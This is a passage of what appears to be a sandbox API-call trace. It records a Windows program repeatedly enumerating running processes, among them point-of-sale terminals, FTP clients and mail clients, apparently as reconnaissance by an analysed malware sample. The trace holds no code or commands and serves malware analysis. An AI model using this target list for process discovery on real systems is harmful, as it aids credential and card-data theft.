Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0247.238] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0247.240] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0247.242] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0247.244] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0247.301] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0247.303] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0247.304] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0247.306] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0247.307] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0247.311] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0247.312] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.314] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0247.315] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0247.317] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0247.318] CloseHandle (hObject=0x1b08) returned 1 [0247.318] Sleep (dwMilliseconds=0x64) [0247.489] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1884 [0247.502] Process32First (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.504] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0247.505] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0247.506] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.508] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0247.509] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0247.511] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0247.514] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0247.516] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0247.518] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.519] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.520] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0247.522] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.523] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.524] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.565] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.566] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.568] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.569] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.571] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0247.572] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0247.575] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0247.576] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.578] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0247.580] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0247.581] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0247.582] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0247.584] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0247.585] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0247.586] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0247.588] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0247.589] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.592] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0247.594] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0247.595] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0247.597] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0247.598] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0247.599] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0247.601] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0247.602] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0247.604] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0247.894] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0247.895] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0247.896] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0247.898] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0247.899] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0247.901] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0247.904] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0247.905] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0247.906] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0247.908] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0247.909] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0247.911] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0247.912] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0247.914] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0247.915] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0247.917] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0247.919] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0247.921] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0247.922] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0247.924] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0247.926] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0247.928] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0247.929] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0247.931] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0248.121] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0248.123] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0248.125] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0248.126] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, 